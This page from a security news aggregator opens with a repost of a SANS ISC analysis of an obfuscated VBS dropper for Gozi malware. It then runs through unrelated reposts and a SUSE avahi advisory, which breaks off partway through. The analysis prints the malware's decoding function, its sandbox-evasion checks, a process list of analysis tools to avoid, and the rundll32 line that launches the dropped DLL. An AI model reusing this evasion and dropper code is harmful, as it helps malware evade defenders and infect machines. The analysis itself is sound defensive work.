Malware Devil

Friday, June 4, 2021

Russian Dolls VBS Obfuscation, (Fri, Jun 4th)

We received an interesting sample from one of our readers (thanks Henry!) and we like this. If you find something interesting, we are always looking for fresh meat! Henry’s sample was delivered in a password-protected ZIP archive and the file was a VBS script called “presentation_37142.vbs” (SHA256:2def8f350b1e7fc9a45669bc5f2c6e0679e901aac233eac63550268034942d9f). I uploaded a copy of the file on MalwareBazaar[1].

When you open it, you spot immediately the first obfuscation technique used: characters encoding but also a lot of junk comments (to make readability more difficult). So, first, let’s get rid of the comments (there are present in both formats: “REM” or a single quote)

root@remnux:/MalwareZoo/20210603# egrep -v “^(REM|’)” presentation_37142.vbs >presentation_37142.vbs.nocomments

When you have a look at the cleaned file, you see some calls to execute the result of a function limpet():

Indeed, below in the code, we find the function:

Function limpet(hmx)
chivalrous=1:pbI=9
KONQLa = lbound(hmx)
OOSUF = ubound(hmx)
for judicious = KONQL to OOSUF
Randomize
if hmx(judicious) = 999999 Then
Talmud = Talmud & ChrW(Int((chivalrous-pbI+1)*Rnd+pbI))
Else
Talmud = Talmud & ChrW(hmx(judicious) – (((5965 – (12 – 6.0)) – 292.0) – 5660.0))
End if
Next
limpet = Talmud
End Function

It’s used to decode arrays of integers that we find in the file. We can try to replace all the execute()calls with Wscript.Echo() and execute the file:

We decoded more pieces of the script but we see that it fails on the line “ELvv”. We can see a bunch of strings at the end of the script:

ELvv
QSV
Zme
numb
TdJb
RGOD
bRDW
tawny
baronial
PRJh
ERa

Those functions are created when the strings are deobfuscated by limpet() and executed. Here is an example:

Function ELvv()
GewqX(“DEBUG: FS_FCH – Start”)
on error resume next
Dim chivalrous,pbI
chivalrous=5000
pbI=2000
Randomize
WScript.Sleep Int((chivalrous-pbI+1)*Rnd+pbI)
Set setupService = GetObject(“winmgmts:\.rootcimv2”)
Set judiciouslItems = setupService.ExecQuery(“Select * from Win32_LogicalDisk”)
For Each inhwg In judiciouslItems
Ppli = Ppli + Int(inhwg.Size / (39 + ((22 + (-17.0)) + (1073741782 – 2.0))))
Next
If round(Ppli) < (((7 + 27.0) + (-19.0)) + (6208 – 6173.0)) Then
GewqX(“DEBUG: FS_FCH – False”)
Ldj
End If
GewqX(“DEBUG: FS_FCH – True”)
End Function

Do you remember all the arrays of interegers in the original script? Not all of them were followed by an execute(). Because they are used in another array in a deobfuscated function:

Function PRJh()
GewqX(“DEBUG: F_DROPPED – Start”)
Dim osteopathic:Set osteopathic = CreateObject(“ADO”+”DB.S”+”tr”+”eam”)
With osteopathic
.Type = 2
.Charset = “ISO-8859-1”
.Open()
For Each codeposit in Array(rUM, dPO, XRbN, yrs, niTC, zVpd, FwV, FCp, bQec, SRtOv, bASM, Nys, GuUuW, WeK, wpzJ, YHKZ, JnPu, oAS, oaC, zlwL, pKkq, NXmo, QTrX, Flut, nAkRy, HRQyY, zzTHn, Csg, omBk, xJrCx, IsEW, XYJUj, NeJ, PxnF, DXx, QvkW, DnNcg, RnDr, vHgx, Ynwg, wfG, aOaUo, HiKrS, xQB, bLErk, COtj, ATRrc, sxLK, Dyj, sDZ, BmUn, jLX, FgF, uhE, dBtN, gaVt, xBJ, PuiTq, btwV, avhtp, hNd, IZh, vJMC, Sqi, saJ, svVXu, qJI, SXft, KIpu, izb, yYY, MtIz, KdoAK, ALd, QJwqG, xisN, sexYP, irJ, NCI, SBma, AQpP, FOz, nVmL, RRB, JIBYA, WfhqI, aQQN, udc, Xvle, OFMs, awj, udzh, OwA, hkgk, SxR, thlD, UXOkn, LKR, TfsoC, wSCJ, cVANb, uZO, BAOxQ, uPPY, BfW, hle, rsdR, QoZkT, Tua, aFr, GCLj, HJy, EGFrK, ppp, ArQcy, LaK, ByYn, ZyPzH, onTV, gARY, HCXTl, ZVt, nKEv, PtaK, eti, hrKE, eXwev, ddDZ, xyN, zCGr, BpvU, lmO, QMl, iZA, bvLfp, GWOG, qWtY, oin, fUDXE, bMSg, uGYU, SMa, GSS, TURRX, vvGy, EiM, BzYH, opQ, OOH, mpKJ, HPnoY, TtJsn, Jdx, DaTI, gdf, xHl, mjF, YnD, KWsA, UrvS, RUkY, szER, tIGWz, UuOZ, kCg, BPiH, ZJS, Met, KVkoD, tdLQ, opJ, CxK, hDX, OqOhw, GJPId, QkuF, jEm, bMjTD, Wfm, qnv, iwX, bPdD, nbva, CcdOc, iEvqT, PTwoC, AjDE, NURs, CXQc, hkGY, QENnM, gIpa, bVf, nNh, CBrt, jiJE, Szoen, qRa, UmwG, dmPCT, xBTPw, mJzrP, hWgcR, kOgs, DINkp, blA, lalRK, UgQmB, gQgs, ZGLuf, GpTw, NKSF, GEya, Szw, sut, mee, MGuCv, pAhj, mhgP, lWqmb, pAD, Eiyd, dCn, DbcQR, rhscz, ARgF, wFpS, MGv, Aqtuc, gfqu, LqY, Iph, MxzQ, QUT, CLzUD, ShzgE, SCr, gSu, BgGX, fEyv, nzHHg, JAtaq, EtUo, tOR, BLo, nlKy, QIKP, QTPI, JorR, Mqo, Qyut, Ekfe, MhvQF, ZtRzU, LjOgB, VyK, Bluo, POGf, nmMl, OwLN, KHn, dbsnZ, qMMuW, DInM, MlbSL, HbS, SVr, Harw, Srd, cLL, EDW754, UajxU, uFp, vCgaf, OFg, JsVin, NIuAD, OVz, veT, EzdVL, DFZgp, WfrR, NCP, sZb, xaCQ, OvD, iXS, OLez, YaIjt, hLDNJ, DMhMf, oRpL, zaY, Cfu, jwt, wRux, WFR, xmAW, Jng, TxJ, YSB, tRDsh, lerhk, cHFw, TqDMb, VEt763, zvJ, zsz, qbO, tvqtX, JFWO, Yvz, lFsX, OtLxd, KiBDP, bfK, Hvp, Kjih, WUCEg, HdTbW, WZPn, lJiok, pAuh, MBqS, grwz, aPsWo, QGdkF, Zig, BvB, AeSnp, pnZl, LEsr, yFS, eJkhN, ozCs, sPP, DpyGu, dJv, ram, fzpK, XAfht, nXB, EoaJ, dhZeR, xwuE, uyB, afK, LVQk, Niqn, FxJFC, wfUhd, kdBo, eqj, CiF, DDMRO, OTj, xnZ842, ADSM, aEQ, hqB, lrBWH, RnGp, xSeG, EOZI, QmScs, VPcRZ, lZOaQ, kCQM, RKE, dMO, LKGwR, RkVx, bPxAv, mmnQO, wSoiq, Mzm, ZEYEP, yqcY, QwCor, XWazl, kYRx, toCiV, nhELZ, kcSLs, oTBxY, DgxmU, ibw, mpkq, aaTTR, LnjuS, wOH, AZL, MdUpB, WzA, yQbeO, cTz, HhpIT, hUDb, TJr, SYw, mTQ, Ncm, Qackb, DBOpx, zUt, jDFf, NQH, EPu, qDh, rWwx, ecbWb, nmVbz, BCH, JfEdB, upm, Aek, SXLUH, kim, XjXMj, OEcx, nJpLa, bqVTd, Tsg, MOA, dBci, YUM, eFa, wQN, TXDP, uHmt, rxW, EcOhJ, KcK, ZetI, RXEK, Imq, LFfk, aWTf, dJklK, DCY, DzPVT, WkK, lmeb, VXy, hmaUa, XsV, tlPuy, KCWj, weqD, gEd574, cRWmH, uyxS, HCm, XtMnx, lijm, uAT, gexWJ, ZQs, VvCEp, pgvCk, LsJh, ySkqT, Kzwtv, gTcM, bhLVG, bMtx, oBA, pCpHo, JhwuT, tmCJ, FlnBx, CWGT, Rzj, wQPJ, JLxr, ueiX, rdbX, DuxK, cszZ, Rbg, UeK, uYU, LeIZq, hBUp, vKTFA, MIY, zCD, XtGy, OLU, Umr, WBWsH, SIjEe, wblv, IXnk, ruRbR, aNW, nJdCW, XexJB, GbZ, Coz, gdp, qtjKq, iUFUB, NlaC, rLNFl, pleE, bma, iyDD, ElvJ, AkGP, Kmv, VQI, dgbHA, bAA, AgU, YTABm, gXjXx, DYm, dXuBM, tFLpx, BqiQ, FgOOF, dHJ, zTKGi, xitWR, htZix, pvn, MVI, gsN, Mpa, Czx, FZf, kyX, uNzIl, zhcBS, yOFY, fPn, qPPJ)
.WriteText limpet(codeposit)
Next
.Position = 0
.SaveToFile sandhill + “racial.drc”, 2
.Close
End With
GewqX(“DEBUG: F_DROPPED – True”)
End Function

That’s why I called it the “Russian Dolls” technique because we have arrays of data used by arrays of data etc… 

Let’s execute the function PRJh() and dump the file on the disk: racial.drc[2] (SHA256:77E706F98B1E4FE48A4A1631B27529DC587AEAB2D187322439D3B5A726DA2F80). It’s a DLL with only one export: DllRegisterServer.

But first, let’s check the other functions in the VBS script:

ELvv checks the available disk space
QSV checks the numbers of CPU (cores)
Zme checks the available memory
numb checks for interesting running processes
TdJb checks the uptime
RGOD check files in %TEMP%
baronial creates a file called “adobe.url” in %TEMP% which points to https://adobe.com (?)

We have here classic sandbox/virtualization detection techniques.

Here is the list of processed searched by numb:

Brenner = Array(“frida-winjector-helper-64.exe”,”frida-winjector-helper-32.exe”,”pythonw.exe”,”pyw.exe”,”cmdvirth.exe”,”alive.exe”,”filewatcherservice.exe”,”ngvmsvc.exe”,”sandboxierpcss.exe”,”analyzer.exe”,”fortitracer.exe”,”nsverctl.exe”,”sbiectrl.exe”,”angar2.exe”,”goatcasper.exe”,”ollydbg.exe”,”sbiesvc.exe”,”apimonitor.exe”,”GoatClientApp.exe”,”peid.exe”,”scanhost.exe”,”apispy.exe”,”hiew32.exe”,”perl.exe”,”scktool.exe”,”apispy32.exe”,”hookanaapp.exe”,”petools.exe”,”sdclt.exe”,”asura.exe”,”hookexplorer.exe”,”pexplorer.exe”,”sftdcc.exe”,”autorepgui.exe”,”httplog.exe”,”ping.exe”,”shutdownmon.exe”,”autoruns.exe”,”icesword.exe”,”pr0c3xp.exe”,”sniffhit.exe”,”autorunsc.exe”,”iclicker-release.exe”,”.exe”,”prince.exe”,”snoop.exe”,”autoscreenshotter.exe”,”idag.exe”,”procanalyzer.exe”,”spkrmon.exe”,”avctestsuite.exe”,”idag64.exe”,”processhacker.exe”,”sysanalyzer.exe”,”avz.exe”,”idaq.exe”,”processmemdump.exe”,”syser.exe”,”behaviordumper.exe”,”immunitydebugger.exe”,”procexp.exe”,”systemexplorer.exe”,”bindiff.exe”,”importrec.exe”,”procexp64.exe”,”systemexplorerservice.exe”,”BTPTrayIcon.exe”,”imul.exe”,”procmon.exe”,”sython.exe”,”capturebat.exe”,”Infoclient.exe”,”procmon64.exe”,”taskmgr.exe”,”cdb.exe”,”installrite.exe”,”python.exe”,”taslogin.exe”,”ipfs.exe”,”pythonw.exe”,”tcpdump.exe”,”clicksharelauncher.exe”,”iprosetmonitor.exe”,”qq.exe”,”tcpview.exe”,”closepopup.exe”,”iragent.exe”,”qqffo.exe”,”timeout.exe”,”commview.exe”,”iris.exe”,”qqprotect.exe”,”totalcmd.exe”,”cports.exe”,”joeboxcontrol.exe”,”qqsg.exe”,”trojdie.kvpcrossfire.exe”,”joeboxserver.exe”,”raptorclient.exe”,”txplatform.exe”,”dnf.exe”,”lamer.exe”,”regmon.exe”,”virus.exe”,”dsniff.exe”,”LogHTTP.exe”,”regshot.exe”,”vx.exe”,”dumpcap.exe”,”lordpe.exe”,”RepMgr64.exe”,”winalysis.exe”,”emul.exe”,”malmon.exe”,”RepUtils32.exe”,”winapioverride32.exe”,”ethereal.exe”,”mbarun.exe”,”RepUx.exe”,”windbg.exe”,”ettercap.exe”,”mdpmon.exe”,”runsample.exe”,”windump.exe”,”fakehttpserver.exe”,”mmr.exe”,”samp1e.exe”,”winspy.exe”,”fakeserver.exe”,”mmr.exe”,”sample.exe”,”wireshark.exe”,”Fiddler.exe”,”multipot.exe”,”sandboxiecrypto.exe”,”XXX.exe”,”filemon.exe”,”netsniffer.exe”,”sandboxiedcomlaunch.exe”)

The function ERa runs the dumped DLL:

avlt = “rundll32″ + ” ” + sandhill + “racial.drc” + “,DllRegisterServer”:setupService.create avlt

This DLL is part of the Gozi[3] malware family and communicates with a C2 server located at authd[.]feronok[.]com.

To conclude, the VBS script has some debugging code implemented via a specific function:

GewqX(“DEBUG: F_MESSAGE – Start”)

The function is simple:

Function GewqX(victrola)
If (InStr(WScript.ScriptName, cStr(82984)) > 0 And ucMHV = 0) Then
MsgBox(victrola)
End If
End Function

The debugging is enabled if the script filename contains the substring “82984”.

[1] https://bazaar.abuse.ch/sample/2def8f350b1e7fc9a45669bc5f2c6e0679e901aac233eac63550268034942d9f/
[2] https://bazaar.abuse.ch/sample/77e706f98b1e4fe48a4a1631b27529dc587aeab2d187322439d3b5a726da2f80/
[3] https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post Russian Dolls VBS Obfuscation, (Fri, Jun 4th) appeared first on Malware Devil.



https://malwaredevil.com/2021/06/04/russian-dolls-vbs-obfuscation-fri-jun-4th/?utm_source=rss&utm_medium=rss&utm_campaign=russian-dolls-vbs-obfuscation-fri-jun-4th

Fake News

Fake news is a false narrative that is published and promoted as if it were true. People (and organizations) create fake news to control and manipulate your thoughts and actions. Be skeptical of what you read on the Internet, use trusted sources that are vetted, check their motivations and funding.
Read More

The post Fake News appeared first on Malware Devil.



https://malwaredevil.com/2021/06/04/fake-news/?utm_source=rss&utm_medium=rss&utm_campaign=fake-news

CFAA Ruling, Amazon Sidewalk, Agile Security Testing, & WordPress Plugins – PSW #697

This week In the Security News, Paul and the Crew talk: Establishing Confidence in IoT Device Security: How do we get there?, JBS hack latest escalation of Russia-based aggression ahead of June 16 Putin summit, why Vulnerability Management is the Key to Stopping Attacks, Overcoming Compliance Issues in Cloud Computing, Attack on meat supplier came from REvil, ransomware’s most cutthroat gang, WordPress Plugins Are Responsible for 98% of All Vulnerabilities, and more!
Visit https://www.securityweekly.com/psw for all the latest episodes!
Show Notes: https://securityweekly.com/psw697

The post CFAA Ruling, Amazon Sidewalk, Agile Security Testing, & WordPress Plugins – PSW #697 appeared first on Malware Devil.



https://malwaredevil.com/2021/06/04/cfaa-ruling-amazon-sidewalk-agile-security-testing-wordpress-plugins-psw-697/?utm_source=rss&utm_medium=rss&utm_campaign=cfaa-ruling-amazon-sidewalk-agile-security-testing-wordpress-plugins-psw-697

ISC Stormcast For Friday, June 4th, 2021 https://isc.sans.edu/podcastdetail.html?id=7528, (Fri, Jun 4th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post ISC Stormcast For Friday, June 4th, 2021 https://isc.sans.edu/podcastdetail.html?id=7528, (Fri, Jun 4th) appeared first on Malware Devil.



https://malwaredevil.com/2021/06/04/isc-stormcast-for-friday-june-4th-2021-https-isc-sans-edu-podcastdetail-htmlid7528-fri-jun-4th/?utm_source=rss&utm_medium=rss&utm_campaign=isc-stormcast-for-friday-june-4th-2021-https-isc-sans-edu-podcastdetail-htmlid7528-fri-jun-4th

ESB-2021.1941.2 – UPDATE [SUSE] avahi: Multiple vulnerabilities

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1941.2
Security update for avahi
4 June 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: avahi
Publisher: SUSE
Operating System: SUSE
Impact/Access: Create Arbitrary Files — Existing Account
Denial of Service — Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-26720 CVE-2021-3468

Reference: ESB-2021.1546
ESB-2021.0682
ESB-2021.0674

Original Bulletin:
https://www.suse.com/support/update/announcement/2021/suse-su-20211845-1
https://www.suse.com/support/update/announcement/2021/suse-su-20211494-2

Comment: This bulletin contains two (2) SUSE security advisories.

Revision History: June 4 2021: Added composite advisories for avahi.
June 4 2021: Initial Release

– ————————–BEGIN INCLUDED TEXT——————–

SUSE Security Update: Security update for avahi

______________________________________________________________________________

Announcement ID: SUSE-SU-2021:1845-1
Rating: important
References: #1180827 #1184521
Cross-References: CVE-2021-26720 CVE-2021-3468
Affected Products:
SUSE Linux Enterprise Server for SAP 15
SUSE Linux Enterprise Server 15-LTSS
SUSE Linux Enterprise High Performance Computing 15-LTSS
SUSE Linux Enterprise High Performance Computing 15-ESPOS
______________________________________________________________________________

An update that fixes two vulnerabilities is now available.

Description:

This update for avahi fixes the following issues:

o CVE-2021-3468: avoid infinite loop by handling HUP event in client_work
(bsc#1184521).
o CVE-2021-26720: drop privileges when invoking avahi-daemon-check-dns.sh
(bsc#1180827)
o Update avahi-daemon-check-dns.sh from Debian. Our previous version relied
on ifconfig, route, and init.d.
o Add sudo to requires: used to drop privileges.

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or “zypper patch”.
Alternatively you can run the command listed for your product:

o SUSE Linux Enterprise Server for SAP 15:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2021-1845=1
o SUSE Linux Enterprise Server 15-LTSS:
zypper in -t patch SUSE-SLE-Product-SLES-15-2021-1845=1
o SUSE Linux Enterprise High Performance Computing 15-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2021-1845=1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2021-1845=1

Package List:

o SUSE Linux Enterprise Server for SAP 15 (ppc64le x86_64):
avahi-0.6.32-5.13.1
avahi-autoipd-0.6.32-5.13.1
avahi-autoipd-debuginfo-0.6.32-5.13.1
avahi-compat-howl-devel-0.6.32-5.13.1
avahi-compat-mDNSResponder-devel-0.6.32-5.13.1
avahi-debuginfo-0.6.32-5.13.1
avahi-debugsource-0.6.32-5.13.1
avahi-glib2-debugsource-0.6.32-5.13.1
avahi-utils-0.6.32-5.13.1
avahi-utils-debuginfo-0.6.32-5.13.1
avahi-utils-gtk-0.6.32-5.13.1
avahi-utils-gtk-debuginfo-0.6.32-5.13.1
libavahi-client3-0.6.32-5.13.1
libavahi-client3-debuginfo-0.6.32-5.13.1
libavahi-common3-0.6.32-5.13.1
libavahi-common3-debuginfo-0.6.32-5.13.1
libavahi-core7-0.6.32-5.13.1
libavahi-core7-debuginfo-0.6.32-5.13.1
libavahi-devel-0.6.32-5.13.1
libavahi-glib-devel-0.6.32-5.13.1
libavahi-glib1-0.6.32-5.13.1
libavahi-glib1-debuginfo-0.6.32-5.13.1
libavahi-gobject-devel-0.6.32-5.13.1
libavahi-gobject0-0.6.32-5.13.1
libavahi-gobject0-debuginfo-0.6.32-5.13.1
libavahi-ui-gtk3-0-0.6.32-5.13.1
libavahi-ui-gtk3-0-debuginfo-0.6.32-5.13.1
libavahi-ui0-0.6.32-5.13.1
libavahi-ui0-debuginfo-0.6.32-5.13.1
libdns_sd-0.6.32-5.13.1
libdns_sd-debuginfo-0.6.32-5.13.1
libhowl0-0.6.32-5.13.1
libhowl0-debuginfo-0.6.32-5.13.1
typelib-1_0-Avahi-0_6-0.6.32-5.13.1
o SUSE Linux Enterprise Server for SAP 15 (noarch):
avahi-lang-0.6.32-5.13.1
o SUSE Linux Enterprise Server for SAP 15 (x86_64):
avahi-32bit-debuginfo-0.6.32-5.13.1
libavahi-client3-32bit-0.6.32-5.13.1
libavahi-client3-32bit-debuginfo-0.6.32-5.13.1
libavahi-common3-32bit-0.6.32-5.13.1
libavahi-common3-32bit-debuginfo-0.6.32-5.13.1
o SUSE Linux Enterprise Server 15-LTSS (aarch64 s390x):
avahi-0.6.32-5.13.1
avahi-autoipd-0.6.32-5.13.1
avahi-autoipd-debuginfo-0.6.32-5.13.1
avahi-compat-howl-devel-0.6.32-5.13.1
avahi-compat-mDNSResponder-devel-0.6.32-5.13.1
avahi-debuginfo-0.6.32-5.13.1
avahi-debugsource-0.6.32-5.13.1
avahi-glib2-debugsource-0.6.32-5.13.1
avahi-utils-0.6.32-5.13.1
avahi-utils-debuginfo-0.6.32-5.13.1
avahi-utils-gtk-0.6.32-5.13.1
avahi-utils-gtk-debuginfo-0.6.32-5.13.1
libavahi-client3-0.6.32-5.13.1
libavahi-client3-debuginfo-0.6.32-5.13.1
libavahi-common3-0.6.32-5.13.1
libavahi-common3-debuginfo-0.6.32-5.13.1
libavahi-core7-0.6.32-5.13.1
libavahi-core7-debuginfo-0.6.32-5.13.1
libavahi-devel-0.6.32-5.13.1
libavahi-glib-devel-0.6.32-5.13.1
libavahi-glib1-0.6.32-5.13.1
libavahi-glib1-debuginfo-0.6.32-5.13.1
libavahi-gobject-devel-0.6.32-5.13.1
libavahi-gobject0-0.6.32-5.13.1
libavahi-gobject0-debuginfo-0.6.32-5.13.1
libavahi-ui-gtk3-0-0.6.32-5.13.1
libavahi-ui-gtk3-0-debuginfo-0.6.32-5.13.1
libavahi-ui0-0.6.32-5.13.1
libavahi-ui0-debuginfo-0.6.32-5.13.1
libdns_sd-0.6.32-5.13.1
libdns_sd-debuginfo-0.6.32-5.13.1
libhowl0-0.6.32-5.13.1
libhowl0-debuginfo-0.6.32-5.13.1
typelib-1_0-Avahi-0_6-0.6.32-5.13.1
o SUSE Linux Enterprise Server 15-LTSS (noarch):
avahi-lang-0.6.32-5.13.1
o SUSE Linux Enterprise High Performance Computing 15-LTSS (aarch64 x86_64):
avahi-0.6.32-5.13.1
avahi-autoipd-0.6.32-5.13.1
avahi-autoipd-debuginfo-0.6.32-5.13.1
avahi-compat-howl-devel-0.6.32-5.13.1
avahi-compat-mDNSResponder-devel-0.6.32-5.13.1
avahi-debuginfo-0.6.32-5.13.1
avahi-debugsource-0.6.32-5.13.1
avahi-glib2-debugsource-0.6.32-5.13.1
avahi-utils-0.6.32-5.13.1
avahi-utils-debuginfo-0.6.32-5.13.1
avahi-utils-gtk-0.6.32-5.13.1
avahi-utils-gtk-debuginfo-0.6.32-5.13.1
libavahi-client3-0.6.32-5.13.1
libavahi-client3-debuginfo-0.6.32-5.13.1
libavahi-common3-0.6.32-5.13.1
libavahi-common3-debuginfo-0.6.32-5.13.1
libavahi-core7-0.6.32-5.13.1
libavahi-core7-debuginfo-0.6.32-5.13.1
libavahi-devel-0.6.32-5.13.1
libavahi-glib-devel-0.6.32-5.13.1
libavahi-glib1-0.6.32-5.13.1
libavahi-glib1-debuginfo-0.6.32-5.13.1
libavahi-gobject-devel-0.6.32-5.13.1
libavahi-gobject0-0.6.32-5.13.1
libavahi-gobject0-debuginfo-0.6.32-5.13.1
libavahi-ui-gtk3-0-0.6.32-5.13.1
libavahi-ui-gtk3-0-debuginfo-0.6.32-5.13.1
libavahi-ui0-0.6.32-5.13.1
libavahi-ui0-debuginfo-0.6.32-5.13.1
libdns_sd-0.6.32-5.13.1
libdns_sd-debuginfo-0.6.32-5.13.1
libhowl0-0.6.32-5.13.1
libhowl0-debuginfo-0.6.32-5.13.1
typelib-1_0-Avahi-0_6-0.6.32-5.13.1
o SUSE Linux Enterprise High Performance Computing 15-LTSS (x86_64):
avahi-32bit-debuginfo-0.6.32-5.13.1
libavahi-client3-32bit-0.6.32-5.13.1
libavahi-client3-32bit-debuginfo-0.6.32-5.13.1
libavahi-common3-32bit-0.6.32-5.13.1
libavahi-common3-32bit-debuginfo-0.6.32-5.13.1
o SUSE Linux Enterprise High Performance Computing 15-LTSS (noarch):
avahi-lang-0.6.32-5.13.1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS (aarch64 x86_64):
avahi-0.6.32-5.13.1
avahi-autoipd-0.6.32-5.13.1
avahi-autoipd-debuginfo-0.6.32-5.13.1
avahi-compat-howl-devel-0.6.32-5.13.1
avahi-compat-mDNSResponder-devel-0.6.32-5.13.1
avahi-debuginfo-0.6.32-5.13.1
avahi-debugsource-0.6.32-5.13.1
avahi-glib2-debugsource-0.6.32-5.13.1
avahi-utils-0.6.32-5.13.1
avahi-utils-debuginfo-0.6.32-5.13.1
avahi-utils-gtk-0.6.32-5.13.1
avahi-utils-gtk-debuginfo-0.6.32-5.13.1
libavahi-client3-0.6.32-5.13.1
libavahi-client3-debuginfo-0.6.32-5.13.1
libavahi-common3-0.6.32-5.13.1
libavahi-common3-debuginfo-0.6.32-5.13.1
libavahi-core7-0.6.32-5.13.1
libavahi-core7-debuginfo-0.6.32-5.13.1
libavahi-devel-0.6.32-5.13.1
libavahi-glib-devel-0.6.32-5.13.1
libavahi-glib1-0.6.32-5.13.1
libavahi-glib1-debuginfo-0.6.32-5.13.1
libavahi-gobject-devel-0.6.32-5.13.1
libavahi-gobject0-0.6.32-5.13.1
libavahi-gobject0-debuginfo-0.6.32-5.13.1
libavahi-ui-gtk3-0-0.6.32-5.13.1
libavahi-ui-gtk3-0-debuginfo-0.6.32-5.13.1
libavahi-ui0-0.6.32-5.13.1
libavahi-ui0-debuginfo-0.6.32-5.13.1
libdns_sd-0.6.32-5.13.1
libdns_sd-debuginfo-0.6.32-5.13.1
libhowl0-0.6.32-5.13.1
libhowl0-debuginfo-0.6.32-5.13.1
typelib-1_0-Avahi-0_6-0.6.32-5.13.1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS (x86_64):
avahi-32bit-debuginfo-0.6.32-5.13.1
libavahi-client3-32bit-0.6.32-5.13.1
libavahi-client3-32bit-debuginfo-0.6.32-5.13.1
libavahi-common3-32bit-0.6.32-5.13.1
libavahi-common3-32bit-debuginfo-0.6.32-5.13.1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS (noarch):
avahi-lang-0.6.32-5.13.1

References:

o https://www.suse.com/security/cve/CVE-2021-26720.html
o https://www.suse.com/security/cve/CVE-2021-3468.html
o https://bugzilla.suse.com/1180827
o https://bugzilla.suse.com/1184521

– ——————————————————————————–

SUSE Security Update: Security update for avahi

______________________________________________________________________________

Announcement ID: SUSE-SU-2021:1494-2
Rating: important
References: #1184521
Cross-References: CVE-2021-3468
Affected Products:
SUSE OpenStack Cloud Crowbar 9
SUSE OpenStack Cloud Crowbar 8
SUSE OpenStack Cloud 9
SUSE OpenStack Cloud 8
SUSE Linux Enterprise Server for SAP 12-SP4
SUSE Linux Enterprise Server for SAP 12-SP3
SUSE Linux Enterprise Server 12-SP4-LTSS
SUSE Linux Enterprise Server 12-SP3-LTSS
SUSE Linux Enterprise Server 12-SP3-BCL
SUSE Linux Enterprise Server 12-SP2-BCL
HPE Helion Openstack 8
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for avahi fixes the following issues:

o CVE-2021-3468: avoid infinite loop by handling HUP event in client_work
(bsc#1184521).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or “zypper patch”.
Alternatively you can run the command listed for your product:

o SUSE OpenStack Cloud Crowbar 9:
zypper in -t patch SUSE-OpenStack-Cloud-Crowbar-9-2021-1494=1
o SUSE OpenStack Cloud Crowbar 8:
zypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2021-1494=1
o SUSE OpenStack Cloud 9:
zypper in -t patch SUSE-OpenStack-Cloud-9-2021-1494=1
o SUSE OpenStack Cloud 8:
zypper in -t patch SUSE-OpenStack-Cloud-8-2021-1494=1
o SUSE Linux Enterprise Server for SAP 12-SP4:
zypper in -t patch SUSE-SLE-SAP-12-SP4-2021-1494=1
o SUSE Linux Enterprise Server for SAP 12-SP3:
zypper in -t patch SUSE-SLE-SAP-12-SP3-2021-1494=1
o SUSE Linux Enterprise Server 12-SP4-LTSS:
zypper in -t patch SUSE-SLE-SERVER-12-SP4-LTSS-2021-1494=1
o SUSE Linux Enterprise Server 12-SP3-LTSS:
zypper in -t patch SUSE-SLE-SERVER-12-SP3-2021-1494=1
o SUSE Linux Enterprise Server 12-SP3-BCL:
zypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2021-1494=1
o SUSE Linux Enterprise Server 12-SP2-BCL:
zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2021-1494=1
o HPE Helion Openstack 8:
zypper in -t patch HPE-Helion-OpenStack-8-2021-1494=1

Package List:

o SUSE OpenStack Cloud Crowbar 9 (x86_64):
avahi-0.6.32-32.15.1
avahi-debuginfo-0.6.32-32.15.1
avahi-debuginfo-32bit-0.6.32-32.15.1
avahi-debugsource-0.6.32-32.15.1
avahi-glib2-debugsource-0.6.32-32.15.1
avahi-utils-0.6.32-32.15.1
avahi-utils-debuginfo-0.6.32-32.15.1
libavahi-client3-0.6.32-32.15.1
libavahi-client3-32bit-0.6.32-32.15.1
libavahi-client3-debuginfo-0.6.32-32.15.1
libavahi-client3-debuginfo-32bit-0.6.32-32.15.1
libavahi-common3-0.6.32-32.15.1
libavahi-common3-32bit-0.6.32-32.15.1
libavahi-common3-debuginfo-0.6.32-32.15.1
libavahi-common3-debuginfo-32bit-0.6.32-32.15.1
libavahi-core7-0.6.32-32.15.1
libavahi-core7-debuginfo-0.6.32-32.15.1
libavahi-glib1-0.6.32-32.15.1
libavahi-glib1-32bit-0.6.32-32.15.1
libavahi-glib1-debuginfo-0.6.32-32.15.1
libavahi-glib1-debuginfo-32bit-0.6.32-32.15.1
libdns_sd-0.6.32-32.15.1
libdns_sd-32bit-0.6.32-32.15.1
libdns_sd-debuginfo-0.6.32-32.15.1
libdns_sd-debuginfo-32bit-0.6.32-32.15.1
o SUSE OpenStack Cloud Crowbar 9 (noarch):
avahi-lang-0.6.32-32.15.1
o SUSE OpenStack Cloud Crowbar 8 (noarch):
avahi-lang-0.6.32-32.15.1
o SUSE OpenStack Cloud Crowbar 8 (x86_64):
avahi-0.6.32-32.15.1
avahi-debuginfo-0.6.32-32.15.1
avahi-debuginfo-32bit-0.6.32-32.15.1
avahi-debugsource-0.6.32-32.15.1
avahi-glib2-debugsource-0.6.32-32.15.1
avahi-utils-0.6.32-32.15.1
avahi-utils-debuginfo-0.6.32-32.15.1
libavahi-client3-0.6.32-32.15.1
libavahi-client3-32bit-0.6.32-32.15.1
libavahi-client3-debuginfo-0.6.32-32.15.1
libavahi-client3-debuginfo-32bit-0.6.32-32.15.1
libavahi-common3-0.6.32-32.15.1
